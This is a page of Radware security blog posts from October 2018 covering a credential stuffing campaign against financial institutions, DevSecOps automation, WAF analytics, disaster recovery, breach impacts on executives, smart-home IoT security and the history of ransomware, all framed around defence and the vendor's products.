main

Application SecuritySecurityWeb Application Firewall

Credential Stuffing Campaign Targets Financial Services

October 23, 2018 — by Daniel Smith0

credential_financial_hacking-960x677.jpg

Over the last few weeks, Radware has been tracking a significant Credential Stuffing Campaign targeting the financial industry in the United States and Europe.

Background

Credential Stuffing is an emerging threat in 2018 that continues to accelerate as more breaches occur. Today, a breach doesn’t just impact the compromised organization and its users, but it also affects every other website that the users may use.

Additionally, resetting passwords for a compromised application will only solve the problem locally while criminals are still able to leverage those credentials externally against other applications due to poor user credential hygiene.

Credential Stuffing is a subset of brute force attacks but is different from Credential Cracking. Credential Stuffing campaigns do not involve the process of brute forcing password combinations. Credential Stuffing campaigns leverage leaked username and passwords in an automated fashion against numerous websites in an attempt to take over users accounts due to credential reuse.

Criminals, like researchers, collect and data mine leaks databases and breached accounts for several reasons. Typically cybercriminals will keep this information for future targeted attacks, sell it for profit or exploit it in fraudulent ways.

The motivations behind the current campaign that Radware is seeing are strictly fraud related. Criminals are using credentials from prior data breaches in an attempt to gain access and take over user’s bank accounts. These attackers have been seen targeting financial organizations in both the United States and Europe. When significant breaches occur, the compromised email addresses and passwords are quickly leveraged by cybercriminals. Armed with tens of millions of credentials from a recently breached website, attackers will use these credentials along with scripts and proxies to distribute their attack in an automated fashion against the financial institution in an attempt to take over banking accounts. These login attempts can happen in such volumes that they resemble a Distributed Denial of Service (DDoS) attack.

Attack Methods

Credential Stuffing is one of the most commonly used attack vectors by cybercriminals today. It’s an automated web injection attack where criminals use a list of breached credentials in an attempt to gain access and take over accounts across different platforms due to poor credential hygiene. Attackers will route their login request through proxy servers to avoid blacklisting their IP address.

Attackers automate the logins of millions of previously discovered credentials with automation tools like cURL and PhantomJS or tools designed specifically for the attack like Sentry MBA and SNIPR.

This threat is dangerous to both the consumer and organizations due to the ripple effect caused by data breaches. When a company is breached, those credentials compromised will either be used by the attacker or sold to other cybercriminals. Once credentials reach its final destination, a for-profit criminal will use that data, or credentials obtain from a leak site, in an attempt to take over user accounts on multiple websites like social media, banking, and marketplaces. In addition to the threat of fraud and identity theft to the consumer, organizations have to mitigate credential stuffing campaigns that generate high volumes or login requests, eating up resources and bandwidth in the process.

Credential Cracking

Credential Cracking attacks are an automated web attack where criminals attempt to crack users password or PIN numbers by processing through all possible combines of characters in sequence. These attacks are only possible when applications do not have a lockout policy for failed login attempts.

Attackers will use a list of common words or recently leaked passwords in an automated fashion in an attempt to take over a specific account. Software for this attack will attempt to crack the user’s password by mutating, brute forcing, values until the attacker is successfully authenticated.

Targets

In recent campaigns, Radware has seen financial institutions targeted in both the United States and Europe by Credential Stuffing campaigns.

Crimeware

Sentry MBA – Password Stuffing Toolkit

Sentry MBA is one of the most popular Credential Stuffing toolkits used by cybercriminals today. This tool is hosted on the Sentry MBA crackers forum. The tool simplifies and automates the process of checking credentials across multiple websites and allows the attackers to configure a proxy list so they can anonymize their login requests.

SNIPR – Credential Stuffing Toolkit

SNIPR is a popular Credential Stuffing toolkit used by cybercriminals and is found hosted on the SNIPR crackers forums. SNIPR comes with over 100 config files preloaded and the ability to upload personal config files to the public repository.

Reasons for Concern

Recent breaches over the last few years have exposed hundreds of millions of user credentials. One of the main reasons for concern of a Credential Stuffing campaign is due to the impact that it has on the users. Users who reuse credentials across multiple websites are exposing themselves to an increased risk of fraud and identity theft.

The second concern is for organizations who have to mitigate high volumes of fraudulent login attempts that can saturate a network. This saturation can be a cause for concern, as it will appear to be a DDoS attack, originating from random IP addresses coming from a variety of sources, including behind proxies. These requests will look like legitimate attempts since the attacker is not running a brute force attack. If the user: pass for that account does not exist or authenticate on the targeted application the program will move on to the next set of credentials.

Mitigation

In order to defend against a Credential Stuffing campaign,  organizations need to deploy a WAF that can properly fingerprint and identify malicious bot traffic as well as automated login attacks directed at your web application. Radware’s AppWall addresses the multiples challenges faced by Credential Stuffing campaigns by introducing additional layers of mitigation including activity tracking and source blocking.

Radware’s AppWall is a Web Application Firewall (WAF) capable of securing Web applications as well as enabling PCI compliance by mitigating web application security threats and vulnerabilities. Radware’s WAF prevents data from leaking or being manipulated which is critically important in regard to sensitive corporate data and/or information about its customers.

The AppWall security filter also detects such attempts to hack into the system by checking the replies sent from the Web server for Bad/OK replies in a specific timeframe. In the event of a Brute Force attack, the number of Bad replies from the Web server (due to a bad username, incorrect password, etc.) triggers the BruteForce security filter to monitor and take action against that specific attacker. This blocking method prevents a hacker from using automated tools to carry out an attack against Web application login page.

In addition to these steps, network operators should apply two-factor authentication where eligible and monitor dump credentials for potential leaks or threats.

Effective Web Application Security Essentials

  • Full OWASP Top-10 coverage against defacements, injections, etc.
  • Low false positive rate – using negative and positive security models for maximum accuracy
  • Auto policy generation capabilities for the widest coverage with the lowest operational effort
  • Bot protection and device fingerprinting capabilities to overcome dynamic IP attacks and achieve improved bot detection and blocking
  • Securing APIs by filtering paths, understanding XML and JSON schemas for enforcement, and activity tracking mechanisms to trace bots and guard internal resources
  • Flexible deployment options – on-premise, out-of-path, virtual or cloud-based

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Application Acceleration & OptimizationApplication DeliverySecurity

DevSecOps Automation? The Roadmap

October 18, 2018 — by Benjamin Maze2

automation_devops_blog_1-960x640.jpg

In my previous blog post, I addressed the need and the process of creating applications faster and building an adaptive infrastructure that suits my real consumption. Today I will highlight how automation can help to ensure that security has an adaptive infrastructure and manages traffic irregularities.

How Can I Guarantee My Security Level?

By using automation, we can also guarantee a level of security on any new application by automatically deploying security rules when a new app is published. No risk of human error or risk to forget something; when a new app is deployed, the security is attached automatically. This is very powerful but needs to be very “industrial”. Exceptions are not the friend of automation; this is very important to standardize applications for use with automation.

IoT is the first threat of a DDoS attack because apps are provisioned very fast, but there is none on the security level. A lot of Botnets are targeting IoT to gain access to many devices. There are several apps and vulnerabilities that hackers can exploit to have access to these devices and create a very large botnet.

Radware can provide automated security services for anti-DDoS and WAF protection on top of ADC services (load balancing, SSL offload, reverse proxy, L7 modification, etc.)

How Can I Have an Adaptive Infrastructure?

With Google Kubernetes, it is very easy to add more containers (or pods) to an application in order to be able to handle more client connections. Kubernetes has its own load balancing mechanisms to share the load between several containers.  However, this service is very limited and cannot give access to all the features that we need on a reverse proxy to expose the application to the rest of the world (nat, SSL offload, L7 load balancing, etc.)

By using intermediate orchestrator for L4-L7 services such as load balancing, DDoS  and WAF – acting as an abstraction layer – this orchestrator can be updated of any changes from Kubernetes and trigger automation workflow to update the infrastructure accordingly:

  • Modify/create/scale up/scale down an ADC service to expose the app outside with full capabilities, including ADC (SSL, NAT, L7 modification, l7 load balancing, persistence, cache, TCP optimization)
  • Modify/create/scale up/scale down DDoS or WAF services to protect this new exposed application

How Can I Manage Exceptional Events That Temporarily Increases My Traffic?

Considering the example of VOD service, we understand that this service will be used differently depending on the time of day. It will experience huge peaks of traffic in the evening when people are watching their TVs but during the day, the traffic will dramatically decrease as most people are at work.

If you scale your application and infrastructure to manage your peak of traffic in the evening, it will cost a lot and this compute will not be used during the day, this is not optimized.

With automation, we can do something smarter by provisioning compute resource accordingly with real needs. That means that my application will run on a few servers during the day and run on several servers during the evening. If I use the public cloud to host my application, I will pay only for my consumption and will not pay for a lot of computing power during the day that I don’t use.

Again, this agility should be at the application layer but also at the infrastructure layer. My ADC, anti-DDoS or WAF services should not be scalable for my peak traffic in the evening but should be adaptive with my real load.

Using an intermediate automation orchestrator can provide an intelligent workflow to follow this trend. In the evening, it can automatically provision new ADC, DDoS, or WAF services on new hosts to provide more computing power and handle a lot of client requests.  Then, de-provision it when they are not needed.

It is important to also have a flexible license model with a license server that dynamically dispatches the license to the ADC, WAF, or DDoS services.

Conclusion

With an intermediate orchestrator, Radware technologies can be used in complex SDDC environment. It provides an abstraction layer based on a workflow that simplifies integration with an external tool like Ansible, Cisco ACI, Juniper Contrail, OpenStack, and Google Kubernete.

vDirect exposes a rest API that is used to trigger a workflow. For example, a workflow can “manage virtual service” with 3 actions:

  • Create a new virtual service (real server, server group, load balancing algorithm, health check, DDoS, WAF, etc.)
  • Modify an existing virtual service (add a real server, change DDoS rules, change load balancing algorithms, etc.)
  • Delete an existing virtual service (delete ADC, DDoS, WAF, configuration).

From an external orchestrator, REST calls are very simple with only one REST call on workflow “manage virtual service”. With all necessary parameters, vDirect can do all the automation on Radware devices such as ADC, anti-DDoS, and WAF.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Application Acceleration & OptimizationApplication VirtualizationSecurity

DevOps: Application Automation? The Inescapable Path

October 17, 2018 — by Benjamin Maze0

automation_devops_blog_2-960x663.jpg

The world is changing. IoT is becoming more and applications hold a prominent place in this new world. As IT infrastructure carries a huge cost and we need to find a way to optimize it.

  • How can I create apps faster?
  • How can I guarantee my security level?
  • How can I have an adaptive infrastructure that suits my real consumption?
  • How can I manage exceptional events that temporarily increase my traffic?

Automation is the answer.

How Can I Create Apps Faster?

First, we need to understand the concepts below from the cloud world:

In the world of application development, developers have several tools that they can use to accelerate the development process. We all know server virtualization has been a good tool that allows us to quickly create a new infrastructure to support new applications. This is the infrastructure-as-a-service in the diagram above. But this virtualization is not fast enough. We need to provision new OS for each virtual server which takes a long time to provision, and it is difficult to manage the high number of OS in the datacenter.

With the arrival of containers (like Docker), you can access virtualization by keeping the same operating system. This is the platform-as-a-service level in the diagram above. As developers’ we do not need to manage the OS. Therefore, the creation and suppression of new services can be done very quickly.

One application can run on several containers that need to talk to each other. Some platforms like Google Kubernetes are used to orchestrate these containers so you can build an application running on several containers that is completely automated. Kubernetes also introduces the capabilities to scale in/scale out an application in real time regarding the traffic load. That means we can imagine a VOD service like Netflix running more or fewer containers depending on the time of day. So, applications will use less computing power when there are fewer viewers that have a direct impact on the cost of the application.

We now understand why it is important to use automation at the application level, but an application does not only exist at the application level. When we publish our apps and make them available for use by external clients, they must travel through a lot of devices, such as a switch, router, firewall, and load balancer in order to function. These devices have to be configured for this application to know what to do on the network level. Historically, those elements are still very manual, and not automated, which results in slow exposure of new application/services because we need human intervention on those devices to build the configuration.

In the DevOps/SecOs domain, we try to create automation on these networks’ elements. Basically, we need to have a fully automated system that takes care of change/add/delete at the application level and do automatic configuration provision on network elements to support this application.

Software-Defined-Data-Center

That’s is what we call a Software-Defined-DataCenter (SDDC), which introduces some kind of “intelligence” in the infrastructure. In this way, it’s possible to have a dynamic infrastructure that follows the request from an application to the infrastructure layer:

  • Automation of application layer based on service virtualization (container)
  • Scale in / scale-out mechanism to provision / de-provision compute according to the exact needs
  • Expose an application automatically to the customer
  • Provision all network/security configuration that is required (switch, router, load balancer, reverse proxy, DDoS, etc.)

Using an intermediate orchestrator, acting as an abstraction layer, can provide a very strong tool to be integrated into this kind of SDDC infrastructure with:

  • Auto-provisioning of ADC services (Alteon VA or vADC on physical Alteon)
  • Auto-provisioning of configuration triggered by an external event (new apps in kubernetes for example)
  • Dynamic scale in / scale out
  • Auto-provisioning of security services (DDoS, WAF)

In the next article, I will continue to answer to the following questions using automation:

  • How can I guarantee my security level?
  • How can I have an adaptative infrastructure that suits my real consumption?
  • How can I manage an exceptional event that increases temporally my traffic?

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Cloud SecuritySecurityWeb Application Firewall

Using Application Analytics to Achieve Security at Scale

October 16, 2018 — by Eyal Arazi1

application_analytics_security_blog-960x584.jpg

Are you overwhelmed by the number of security events per day? If so, you are not alone.

Alert Fatigue is Leaving You Exposed

It is not uncommon for security administrators to receive tens of thousands of security alerts per day, leading to alert fatigue – and worse – security events going unattended.

Tellingly, a study conducted by the Cloud Security Alliance (CSA) found that over 40% of security professionals think alerts lack actionable intelligence that can help them resolve security events. More than 30% of security professionals ignore alerts altogether because so many of them are false positives. Similarly, a study by Fidelis Cybersecurity found that almost two-thirds of organizations review less than 25% of alerts every day and only 6% triage 75% or more of alerts per day that they receive.

As a result of this alert flood, many organizations leave the majority of their security alerts unchecked. This is particularly a problem in the world of application security, as customer-facing applications frequently generate massive amounts of security events, based on user activity. Although many of these events are benign, some are not—and it only takes one alert to open the doors to devastating security events, like a data breach.

Not examining these events in detail leaves applications (and the data they store) exposed to security vulnerabilities, false positives, and sub-optimal security policies, which go unnoticed.

Many Events, but Few Activities

The irony of this alert flood is that when examined in detail, many alerts are, in fact, recurring events with discernible patterns. Examples of such recurring patterns are accessed to a specific resource, multiple scanning attempts from the same origin IP, or execution of a known attack vector.

Traditionally, web application firewall (WAF) systems log each individual event, without taking into consideration the overall context of the alert. For example, a legitimate attempt by a large group of users to access a common resource (such as a specific file or page), and a (clearly illegitimate) repeated scanning attempts by the same source IP address, would all be logged the same way: each individual event would be logged once, and not cross-linked to similar events.

How to Achieve Security at Scale

Achieving security at scale requires being able to separate the wheat from the chaff when it comes to security events. That is, distinguishing between large amounts of routine user actions which has little implication for application security, and high-priority alerts which are indicative of malicious hacking attempts or may otherwise suggest a problem with security policy configuration (for example, such as a legitimate request being blocked).

In order to be able to make this separation, there are a number of questions that security administrators need to ask themselves:

  1. How frequently does this event occur? That is, does this behavior occur often, or is it a one-off event?
  2. What is the trend for this event? How does this type of behavior reflect over time? Does it constantly occur at a constant rate, or is there a sudden massive spike?
  3. What is the relevant header request data? What are the relevant request methods, destination URL, resource types, and source/destination details?
  4. Is this type of activity indicative of a known attack? Is there a legitimate explanation for this event, or does it usually signify an attempted attack?

Each of these questions can go either way in terms of explaining security events. However, administrators will do well to have all of this information readily available, in order to reach an informed assessment based on the overall context.

Having such tools – and taking the overall context into consideration – confers security professionals with a number of significant benefits:

  • Increased visibility of security events, to better understand application behavior and focus on high-priority alerts.
  • More intelligent decision making on which events should be blocked or allowed.
  • A more effective response in order to secure applications against attacks as much as possible, while also making sure that legitimate users are not impacted.

Radware’s Application Analytics

Radware developed Application Analytics – the latest feature in Radware’s Cloud WAF Service to address these customer needs.

Radware’s Cloud WAF Application Analytics works via a process of analysis based on machine-learning algorithms, which identify patterns and group similar application events into recurring user activities:

  1. Data mapping of the log data set, to identify all potential event types
  2. Cluster analysis using machine learning algorithms to identify similar events with common characteristics
  3. Activity grouping of recurring user activities with common identifiers
  4. Data enrichment of supplemental details on activities to provide further context on activities

Radware’s Cloud WAF Application Analytics takes large numbers of recurring log events and condensing them into a small number of recurring activities.

In several customer trials, this capability allowed Radware to reduce the number of Cloud WAF alerts from several thousand (or even tens of thousands) to a single-digit (or double digit) number of activities. This allows administrators to focus on the alerts that matter.

For example, one customer reduced over 8,000 log events on one of their applications into 12 activities (seen above), whereas another customer reduced more than 3,500 security events into 13 activities.

The benefits for security administrators are easy to see: rather than drown in massive amounts of log events with little (or no) context to explain them. Cloud WAF Application Analytics now provides a tool to reduce log overload into a manageable number of activities to analyze, which administrators can now handle.

Ultimately, there is no silver bullet when it comes to WAF and application security management: administrators will always need to balance being as secure as possible (and protect private user data), with the need to be as accessible as possible to those same users. Cloud WAF Application Analytics are Radware’s attempt to disentangle this challenge.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

DDoSSecurity

Disaster Recovery: Data Center or Host Infrastructure Reroute

October 11, 2018 — by Daniel Lakier1

disaster-recovery-data-center-host-infrastructure-reroute-blog-960x540.jpg

Companies, even large ones, haven’t considered disaster recovery plans outside of their primary cloud providers own infrastructure as regularly as they should. In March of this year, Amazon Web Services (AWS) had a massive failure which directly impacted some of the world’s largest brands, taking them offline for several hours. In this case, it was not a malicious attack but the end result was the same— an outage.

When the organization’s leadership questioned their IT departments on how this outage could happen, most received an answer that was somehow acceptable:  It was AWS. Amazon failed, not us. However, that answer should not be acceptable.

AWS implies they are invulnerable, but the people running IT departments are running it for a reason. They are meant to be skeptics, and it is their job to build redundancies that protect the system against any one point of failure.  Some of those companies use AWS disaster recovery services, but if the data center and all the technology required to turn those fail-safes on crashes, then you’re down. This is why we need to treat the problem with the same logic that we use for any other system. Today it is easier than ever to create a resilient DoS resistant architecture that not only takes traditional malicious activity into account but also critical business failures. The solution isn’t purely technical either, it needs to be based upon sound business principles using readily available technology.

[You might also like: DDoS Protection is the Foundation for Application, Site and Data Availability]

In the past enterprise disaster recovery architecture revolved around having a fully operational secondary location. If we wanted true resiliency that was the only option. Today although that can still be one of the foundation pillars to your approach it doesn’t have to be the only answer. You need to be more circumspect about what your requirements are and choose the right solution for each environment/problem.  For example:

  • A) You can still build it either in your own data center or in a cloud (match the performance requirements to a business value equation).
  • B) Several ‘Backups-as-a-Service’ will offer more than just storage in the cloud. They offer resources for rent (servers to run your corporate environments in case of an outage). If your business can sustain an environment going down just long enough to turn it back on (several hours), this can be a very cost-effective solution.
  • C) For non-critical items, rely on the cloud provider you currently use to provide near-time failure protection.

The Bottom Line

Regardless of which approach you take, even if everything works flawlessly, you still need to address the ‘brownout’ phenomenon or the time it takes for services to be restored at the primary or to a secondary location. It is even more important to automatically send people to a different location if performance is impaired. Several people have heard of GSLB, and while many use it today, it is not part of their comprehensive DoS approach.  But it should be. If your goal with your DDoS mitigation solution is to ensure an uninterrupted service in addition to meeting your approved performance SLA; then dynamic GSLB or infrastructure based performance load balancing has to be an integral part of any design.

We can deploy this technology purely defensively, as we have traditionally done with all DoS investments or we change the paradigm and deploy the technology to help us exceed expectations. This allows us to give each individual user the best experience possible. Radware’s dynamic performance-based route optimization solution (GSLB) allows us to offer a unique customer experience to each and every user regardless of where they are coming from, how they access the environment or what they are trying to do. This same technology allows us to reroute users in the event of a DoS event that takes down an entire site be it from malicious behavior, hardware failure or simple human error. This functionality can be procured as a product or a service as it is environment/cloud agnostic and relatively simple to deploy. It is not labor intensive and may be the least expensive part of an enterprise DOS architecture.

What we can conclude is that any company that blames the cloud provider for a down site in the future should be asked the hard questions because solving this problem is easier today than ever before.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

BotnetsDDoSSecurityWAF

Protecting Sensitive Data: A Black Swan Never Truly Sits Still

October 10, 2018 — by Mike O'Malley1

protecting-sensitive-data-never-sit-still-960x540.jpg

The black swan – a rare and unpredictable event notorious for its ability to completely change the tides of a situation.

For cybersecurity, these nightmares can take the form of disabled critical services such as municipal electrical grids and other connected infrastructure networks, data breaches, application failures, and DDoS attacks. They can range from the levels of Equifax’s 2018 Breach Penalty Fines (estimated close to $1.5 billion), to the bankruptcy of Code Spaces following their DDoS attack and breach (one of the 61% of SMBs companies that faced bankruptcy per service provider Verizon’s investigations), to a government-wide shutdown of web access in public servants’ computers in response to a string of cyberattacks.

Litigation and regulation can only do so much to reduce the impact of black swans, but it is up to companies to prepare and defend themselves from cyberattacks that can lead to rippling effects across industries.

[You might also like: What a Breach Means to Your Business]

If It’s So Rare, Why Should My Company Care?

Companies should concern themselves with black swans to understand the depth of the potential long-term financial and reputation damage and suffering. Radware’s research on C-Suite Perspectives regarding the relationship between cybersecurity and customer experience shows that these executives prioritize Customer Loss (41%), Brand Reputation (34%), and Productivity/Operational Loss (34%). Yet, a majority of these same executives have not yet integrated security practices into their company’s security infrastructure such as their application DevOps teams.

The long-term damage on a company’s finances is note-worthy enough. IT provider CGI found that for technology and financial companies alone, they can lose 5-8.5% in enterprise value from the breach. What often goes unreported, however, is the increased customer onboarding costs to combat against large-scale customer churn following breaches.

For the financial sector, global accounting firm KPMG found that consumers not only expect institutions to act quickly and take responsibility, but 48% are willing to switch banks due to lack of responsibility and preparation for future attacks, and untimely notification of the breaches. News publication The Financial Brand found that banking customers have an average churn rate of 20-40% in 12 months, while a potential onboarding cost per customer can be within the $300-$20,000 range. Network hardware manufacturer Cisco estimates as high as 20% of customers and opportunities could be lost.

Just imagine the customer churn rate for a recently-attacked company.

How does that affect me personally as a business leader within my company?

When data breaches occur, the first person that typically takes the blame is the CISO or CSO. A common misconception, however, is that everyone else will be spared any accountability. But the damage is not limited to just security leadership. Due to the wide array of impacts that result from a cyberattack, nearly all C-level executives are at risk; examples include but are not limited to Equifax’s CEO, Richard Smith, Target CEO Gregg Steinhafel and CIO Beth Jacob. This results in a sudden emptiness of C-Suite level employees. Suddenly, there’s a lack of leadership and direction, causing its own internal combination of instability.

Today’s business leaders need to understand that a data breach is no longer limited to the company’s reputation, but the level of welfare of its customers. Just the event of a data breach can shatter the trust between the two entities. CEOs are now expected to be involved with managing the black swan’s consequences; in times of these hardships, they are particularly expected to continue being the voice of the company and to provide direction and assurance to vulnerable customers.

A business leader can be ousted from the company for not having taken cybersecurity seriously enough and/or not understanding the true costs of a cyberattack – that is, if the company hasn’t filed for bankruptcy yet.

Isn’t this something that my company’s Public Relations department should be handling?

One of the biggest contributors to the aftermath chaos of a black swan is the poor/lack of communication from the public relations team. By not disclosing a data breach in a timely manner, companies incur the wrath of the consumer and suffer an even bigger loss in customer loyalty because of delays. A timely announcement is expected as soon as the company discovers the incident, or according to the GDPR, within 72 hours of the discovery.

A company and its CEO should not solely depend on their public relations department to handle a black swan nightmare. Equifax revealed its data breach six weeks after the incident and still hadn’t directly contacted those that were affected, instead of creating a website for customer inquiries. Equifax continues to suffer from customer distrust because of the lack of guidance from the company’s leadership during those critical days in 2017. At a time of confusion and mayhem, a company’s leader must remain forthcoming, reassuring and credible through the black swan’s tide-changing effects.

Following the cybersecurity black swan, a vast majority of consumers must also be convinced that all the security issues have been addressed and rectified, and the company has a plan in place for any future repeated incidents. Those that fail to do so are at risk of losing at least every 1 in 10 customers, exhibiting the potential reach of impact a black swan can have within a company alone, beyond financial aspects.

How Do You Prepare for When the Black Swan Strikes?

When it comes to the black swan, the strategic method isn’t limited to be proactive or reactive, but to be preemptive, according to news publication ComputerWeekly. The black swan is primarily feared for its unpredictability. The key advantage of being preemptive is the level of detail that goes into planning; instead of reacting in real-time during the chaos or having a universal one-size fits all type of strategy, companies should do their best to develop multiple procedures for multiple worst-case scenarios.

Companies cannot afford to be sitting ducks waiting for the black swan to strike, but must have prepared mitigation plans in place for the likelihood. The ability to mitigate through extreme cyber threats and emerging cyberattack tactics is a dual threat to the company, depending on the level of cybersecurity preparation a company possesses. By implementing a strong cybersecurity architecture (internal or third-party), companies can adapt and evolve with the constant-changing security threats landscape; thereby minimizing the opportunities for hackers to take advantage.

In addition to having a well-built security system, precautions should be taken to further strengthen it including WAF Protection, SSL Inspections, DDoS Protection, Bot Protection, and more. Risk management is flawed due to its nature of emphasis on internal risks only. What’s been missing is companies must do more to include the possibilities of industry-wide black swans, such as the Target data breach in 2013 that later extended to Home Depot and other retailers.

It’s Time To Protect Sensitive Data

In the end, the potential impact of a black swan on a company comes down to its business owners. Cybersecurity is no longer limited to a CISO or CSO’s decision, but the CEO. As the symbol and leader of a company, CEOs need to ask themselves if they know how their security model works. Is it easily penetrated? Can it defend against massive cyberattacks?  What IP and customer data am I protecting?  What would happen to the business if that data was breached?

Does it protect sensitive data?

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Attack MitigationSecurity

Consolidation in Consumer Products: Could it Solve the IoT Security Issues?

October 9, 2018 — by David Hobbs1

consolidation_in_iot_security_blog-960x640.jpg

In 2003, I went to Zermatt, Switzerland to go snowboarding under the Matterhorn. We had an eclectic group of people from all over the world. Some of us were enthusiasts, some ski patrol or medics, and a few were backcountry avalanche trained. Because of this, we had a lot of different gear with us, including ice saws, shovels, probes, avalanche beacons, radios, etc. In addition to the gear we carried, we also brought cameras, cell phones, MP3 players and of course, large battery charger bays with international inverters/adapters to keep everything going. I had a backpack with all the avalanche and snow testing gear. In my jacket, I carried an avalanche beacon,  digital camera,  flip cell phone,  family radio with a long external mic, GPS, and an MP3 player with headphones. I felt like I was Batman with all the gear crammed all over the place. I told one of my friends on the trip that one day all of this technology would be consolidated into one device – radio, phone, camera, MP3 player, and avalanche beacon. My friends thought I was crazy and that it would never happen. Fast forward to the smartphone where we now have it all, with the exception of Avalanche beacon, in one device.

To think that many of us had these “point solutions” in our personal tech and now it’s all consolidated into one makes me wonder when will we consolidate at home?

The future of the smart home

I have a Zigbee bridge for my lights, a Zigbee bridge for my blinds, 5 smart speakers, solar panels on the blinds (to charge them and get heat/sunlight measures), smart smoke detectors, smart locks, IP cameras, smart watering system for the plants, smart lights, smart alarm, UTM firewall, WiFi mesh, etc. These are all point solutions. Some of them are really neat and probably should stay point solution based, but what if the technology companies today were to start thinking about consolidating and adding security into the mix?

[You might also like: Cities Paying Ransom: What Does It Mean for Taxpayers?]

I’ve started to look at upgrading my home WiFi network as my smart TV and smart streaming box are now struggling to play streaming movies. After looking at some of the new consumer level WiFi mesh solutions, they show a lot of promise. One of the vendors I’m considering offers not only an easy to set up mesh WiFi, but they also provide automatic channel changing for WiFi radio frequencies to find the fastest radio, as well as automatically move devices around to access points. One of them offers VPN services as well as anti-virus and content filtering, (keeping you safe from malicious websites) and giving out tokens for guests and keeping them on their own network. This all looks great, but I started to think back to Zermatt, Switzerland.

What if the smart home speaker manufacturers wanted to really capture the market? What if you could get a smart speaker that had both a WiFi Mesh Access Point, Zigbee/Zwave access point (for lights, controllers, etc), and cloud-based security features in it? If I could drop a new smart speaker in any room and set it up in 3-5 minutes and have it join my wireless mesh network, it could cover a lot of territories quickly. Now, if one of them were the base unit that plugged into the internet router, it could be the main interface for security. Take all the device groups and help suggest security policies to keep them from talking to things they shouldn’t (like the cameras should never talk to the smart watering controller). What if it could look for IoT threats that spread internally as well as connections to malware Command and Control servers?

Security should be a priority

In terms of the security that could easily be offered and bundled across this platform could be things like VPN (both to and from the home network). This could allow you to browse safely while using public WiFi. You could also access any home devices that may not be very secure from the manufacturers like IP cameras and DVR’s without having to expose them to the world. Cloud-based security offerings could do things like look for malware infections and requests to malware botnet controllers. Then, layers like intrusion prevention and active WiFi defense layers could help detect if hackers were aiming at getting onto the network and doing harm. And finally, putting all of these offerings into a single pane of glass for visibility would definitely be attractive to end customers.

Granted, I know this could put the point solution providers in a position where their WiFi solutions and home routers become less valuable to the mainstream. But what if we got better antivirus and IOT protection? I can only dream of the day that we as consumers are able to consolidate all of our home networks to a real smart home-based solution. I know in the enterprise IT market; we have gained the popularity of Unified Threat Management platforms. Firewalls that do Intrusion Prevention, Wireless Intrusion Prevention, Inline Antivirus, Content Filtering, Guest and networks. I think the next logical step is to see all of these features consolidated into the next generation smart home speakers. How long will it take to see this reality? I don’t know. Will people think this idea is crazy? Probably.

Update: At the time of writing this, there has been an announcement from one of the smart home speaker manufacturers for a new smart home speaker. This new line will actually include a smart home hub in the speaker.  Nothing has been said as to whether it provides any security features.

Read “Radware’s 2018 Web Application Security Report” to learn more.

Download Now

Attack Types & VectorsSecurity

The Origin of Ransomware and Its Impact on Businesses

October 4, 2018 — by Fabio Palozza2

origin_of_ransomware_and_business_impacts-960x641.jpg

In previous articles we’ve mentioned how Ransomware has wreaked havoc, invading systems and putting organizations’ reputation and stability at stake. In this article, we’ll start with the basics and describe what ransomware is and how it is used by cybercriminals to attack tens of thousands of systems by taking advantage of system-vulnerabilities.

[You might also like: Top Cryptomining Malware. Top Ransomware]

Ransomware is defined as a form of malicious software that is designed to restrict users from accessing their computers or files stored on computers till they pay a ransom to cybercriminals. Ransomware typically operates via the crypto virology mechanism, using symmetric as well as asymmetric encryption to prevent users from performing managed file transfer or accessing particular files or directories. Cybercriminals use ransomware to lock files from being used assuming that those files have extremely crucial information stored in them and the users are compelled to pay the ransom in order to regain access.

The History

It’s been said that Ransomware was introduced as an AIDS Trojan in 1989 when Harvard-educated biologist Joseph L. Popp sent 20,000 compromised diskettes named “AIDS Information – Introductory Diskettes” to attendees of the internal AIDS conference organized by the World Health Organization. The Trojan worked by encrypting the file names on the customers’ computer and hiding directories. The victims were asked to pay $189 to PC Cyborg Corp. at a mailbox in Panama.

From 2006 and on, cybercriminals have become more active and started using asymmetric RSA encryption. They launched the Archiveus Trojan that encrypted the files of the My Documents directory. Victims were promised access to the 30-digit password only if they decided to purchase from an online pharmacy.

After 2012, ransomware started spreading worldwide, infecting systems and transforming into more sophisticated forms to promote easier attack delivery as the years rolled by. In Q3, about 60,000 new ransomware was discovered, which doubled to over 200,000 in Q3 of 2012.

The first version of CryptoLocker appeared in September 2013 and the first copycat software called Locker was introduced in December of that year.

Ransomware has been creatively defined by the U.S. Department of Justice as a new model of cybercrime with a potential to cause impacts on a global scale. Stats indicate that the use of ransomware is on a steady rise and according to Veeam, businesses had to pay $11.7 on average in 2017 due to ransomware attacks. Alarmingly, the annual ransomware-induced costs, including the ransom and the damages caused by ransomware attacks, are most likely to shoot beyond $11.5 billion by 2019.

The Business Impacts can be worrisome

Ransomware can cause tremendous impacts that can disrupt business operations and lead to data loss. The impacts of ransomware attacks include:

  • Loss or destruction of crucial information
  • Business downtime
  • Productivity loss
  • Business disruption in the post-attack period
  • Damage of hostage systems, data, and files
  • Loss of reputation of the victimized company

You will be surprised to know that apart from the ransom, the cost of downtime due to restricted system access can bring major consequences. As a matter of fact, losses due to downtime may cost tens of thousands of dollars daily.

As ransomware continues to become more and more widespread, companies will need to revise their annual cybersecurity goals and focus on the appropriate implementation of ransomware resilience and recovery plans and commit adequate funds for cybersecurity resources in their IT budgets.

Read “Consumer Sentiments: Cybersecurity, Personal Data and The Impact on Customer Loyalty” to learn more.

Download Now

Application SecurityAttack MitigationSecurityWeb Application Firewall

Are Your Applications Secure?

October 3, 2018 — by Ben Zilberman2

WAF_REPORT_BLOG_Cover_img-960x715.jpg

Executives express mixed feelings and a surprisingly high level of confidence in Radware’s 2018 Web Application Security Report. 

As we close out a year of headline-grabbing data breaches (British Airways, Under Armor, Panera Bread), the introduction of GDPR and the emergence of new application development architectures and frameworks, Radware examined the state of application security in its latest report. This global survey among executives and IT professionals yielded insights about threats, concerns and application security strategies.

The common trend among a variety of application security challenges including data breaches, bot management, DDoS mitigation, API security and DevSecOps, was the high level of confidence reported by those surveyed. 90% of all respondents across regions reported confidence that their security model is effective at mitigating web application attacks.

Attacks against applications are at a record high and sensitive data is shared more than ever. So how can execs and IT pros have such confidence in the security of their applications?
